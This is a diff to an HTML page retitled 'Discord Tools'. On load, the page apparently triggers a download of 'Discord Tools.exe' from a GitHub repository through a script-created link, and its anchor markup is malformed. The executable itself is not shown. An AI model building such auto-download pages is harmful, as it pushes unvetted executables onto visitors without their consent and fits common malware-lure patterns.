--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8" />
-  <title>Downloading...</title>
+  <title>Discord Tools</title>
   <script>
     window.onload = function() {
       const link = document.createElement('a');
@@ -15,6 +15,6 @@
   </script>
 </head>
 <body>
-  <p> <a href="https://github.com/Tyvrixx/discordtools/raw/refs/heads/main/Discord%20Tools.exe" download>/a>.</p>
+  <p><a href="https://github.com/Tyvrixx/discordtools/raw/refs/heads/main/Discord%20Tools.exe" download>/a>.</p>
 </body>
 </html>
